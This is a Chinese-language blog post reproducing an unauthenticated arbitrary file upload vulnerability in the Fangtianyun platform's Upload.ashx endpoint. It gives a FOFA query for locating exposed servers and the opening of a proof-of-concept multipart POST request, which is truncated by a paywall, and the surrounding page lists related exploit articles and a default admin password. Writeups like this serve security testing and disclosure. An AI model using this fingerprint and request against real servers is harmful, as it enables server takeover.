方天云智慧平台系统 Upload.ashx 任意文件上传漏洞复现

已于 2024-07-31 15:53:02 修改
阅读量274 收藏
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-07-31 15:50:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/140824835
版权

0x01 产品简介

方天云智慧平台系统,作为方天科技公司的重要产品,是一款面向企业全流程的业务管理功能平台,集成了ERP(企业资源规划)、MES(车间执行系统)、APS(先进规划与排程)、PLM(产品生命周期)、CRM(客户关系管理)等多种功能模块,旨在通过云端服务为企业提供数字化、智能化的管理解决方案。

0x02 漏洞概述

方天云智慧平台系统 Upload.ashx 接口处存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 复现环境

FOFA:body="AjaxMethods.asmx/GetCompanyItem"

0x04 漏洞复现

PoC

POST /Upload.ashx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
Connection: close

------WebKitFormBoundarySl8siBbmVicABvTX
Content-Disposition: form-data; name="fi
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
订阅专栏
方天云智慧平台系统 GetCompanyItem SQL注入漏洞复现
0xSec
07-25 176
方天云智慧平台系统 GetCompanyItem 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
ERPNext SQL 注入漏洞复现
0xSec
12-05 909
ERPNext frappe.model.db_query.get_list 文件 filters 参数存在 SQL 注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
方天云智慧平台系统 GetCustomerLinkman SQL注入漏洞复现
最新发布
0xSec
07-31 188
方天云智慧平台系统 GetCustomerLinkman 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现--云时空商业ERP文件上传
qq_53003652的博客
12-06 556
云时空商业ERP以大型集团供应链系统为支撑,是基于互联网技术的多渠道模式营销服务管理体系,可以帮助您整合线上和线下交易模式,覆盖企业经营管理应用各个方面。该产品存在任意文件上传漏洞,攻击者可通过此漏洞获取服务器权限。访问/uploads/pics/【返回的日期】/【上传文件名称】联系厂家获取漏洞修复补丁。
平台默认管理员账号密码是多少?
Uniview400的博客
04-21 2497
Q:VM平台默认管理员账号密码是多少? A:账号admin,密码123456/admin,账号loadmin密码loadmin
HW漏洞威胁情报第七天|HW情报
weixin_43167326的博客
07-31 449
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
oracle数据文件离线,oracle数据库的文件在哪里
weixin_36448199的博客
04-04 272
Oracle体系结构Oracle 服务器由Oracle实例与Oracle数据库组成Oracle实例(instance),通过ORACLE_SID来引导(Oracle标识)单实例情况下:Oracle数据库名与Oracle实例名相同且具有唯一性举例:三国中,关羽使用青龙偃月刀,吕布使用方天画戟,这就是唯一性身份标...文章技术小甜2017-11-16910浏览量oracle控制文件损坏的解决方案ora...
方天ERP登录错误 Exception EOleSysError in module rtl60.bpl
方天ERP
05-30 6686
登录提示如下错误,是因为软件内包含了flash功能,调用flash出错。下载最新的flash插件安装后重启即可。
2.ECMAScript6详解
Junsunnyl的博客
09-29 209
文章目录ECMAScript6详解1.ECMAScript6 简介1.1 ECMAScript 和 JavaScript 的关系1.2 ES6 与 ECMAScript 2015 的关系2.搭建前端环境2.1 Node 环境2.1.1 什么是Node.js2.1.2 Node.js有什么用2.1.3 安装2.1.3.1 下载2.1.3.2 查看版本2.1.4.1 创建文件夹 lagou-node2.1.4 服务器端应用开发(了解)2.2 NPM环境2.2.1 什么是NPM2.2.2 NPM工具的安装位置2.
方天丽景花园策划报告书.doc
09-18
【方天丽景花园策划报告】是一份针对房地产项目的详细策划文档,由智帝商务策划公司提供。报告全面分析了项目的基本情况、产品特性、市场环境以及推广策略等多个方面。 一、项目概况 方天丽景花园位于蜀山区路与...
方天丽景花园策划报告8.doc
09-16
【方天丽景花园策划报告】是一份关于房地产项目的详细策划文档,主要涵盖了项目概况、产品分析、市场研究、目标客户群预测、项目定位、整体观念导入与塑造、案名建议、执行策略等多个方面。该项目位于蜀山区黄山路与...
建筑施工组织2021-方天丽景花园策划报告8.doc
05-19
【建筑施工组织2021-方天丽景花园策划报告8.doc】是一份关于房地产开发的详尽策划文档,由上海智帝商务策划有限公司提供。该报告主要针对安徽新方天房地产开发有限公司在蜀山区黄山路·潜山路交界处的项目——方天...
方天Erp系统教育训练基本操作PPT学习教案.pptx
10-08
方天Erp系统教育训练基本操作PPT学习教案.pptx
方天软件:2019年年度报告.PDF
05-22
4. **新业务拓展**:2019年9月,方天软件进行了市场初级调研后,成功立项了“方天云镜社区”项目。这标志着公司在原有计算机应用软件开发基础上适度扩展,将企业级的技术积累、管理经验和相关成果引入移动消费级市场...
深入探讨:如何在Shopee平台安全运营多个店铺?
Ssm2022的博客
07-24 730
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1051
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
网络安全自学从入门到精通的制胜攻略!!!
2301_77160226的博客
07-27 249
在信息时代,网络安全已成为至关重要的领域。越来越多的人希望通过自学掌握这门技术,开启充满挑战与机遇的职业道路。
“微软蓝屏”事件引发的深度思考:网络安全系统稳定性的挑战与应对
CWPIN21的博客
07-23 1346
近日,一次由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,不仅成为科技领域的热点新闻,更是一次对全球IT基础设施韧性与安全性的深刻检验。这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。面对如此大规模的系统中断,网络安全系统稳定性的讨论再次被推上风口浪尖。如何构建更加稳固和安全的网络环境?
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值